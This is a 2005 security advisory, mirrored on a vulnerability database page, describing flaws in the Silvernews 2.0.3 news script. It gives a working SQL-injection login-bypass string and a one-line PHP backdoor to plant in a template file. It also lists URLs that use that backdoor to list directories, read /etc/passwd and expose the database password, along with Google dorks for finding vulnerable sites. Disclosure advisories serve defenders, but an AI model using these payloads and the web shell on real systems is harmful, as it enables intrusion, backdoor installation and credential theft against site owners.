Lucene search
K

silvernews203.txt

🗓️ 05 Aug 2005 00:00:00Reported by rgodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Silvernews 2.0.3 software security vulnerabilities including SQL Injection, Login Bypass, Remote Commands Execution, and Cross Site Scriptin

Code
`Silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting  
  
software:  
author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews  
  
SQL Injection / Login bypass:  
  
A user can bypass admin password check, if magic_quotes is set to off:   
  
user: ' or isnull(1/0) /*  
pass: whatever  
  
  
remote commands execution:  
  
now, new admin can edit template, clicking on Templates -> Global footer, can  
add the lines:  
  
//***********************************************  
</body>  
</html>  
  
TEMPLATE;  
}  
}  
system($HTTP_GET_VARS[command]);  
  
/*  
  
to leave a backdoor in template file /templates/tpl_global.php  
now can launch system commands on the target system with theese urls:  
  
http://[target]/[path]//templates/tpl_global.php?command=ls%20-la  
  
to list directories  
  
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd  
  
to see /etc/passwd file  
  
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php  
  
to see Mysql database password (look inside html...)  
  
  
cross site scripting:  
  
same way, a user can hide evil javascript code in template   
  
  
googledork: "Powered by SilverNews"   
or: intitle:"SilverNews 2.0 Admin control panel"   
  
  
rgod  
email: retrogod [at] aliceposta.it  
site: http://rgod.altervista.org  
  
  
original advisory: http://www.rgod.altervista.org/silvernews.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation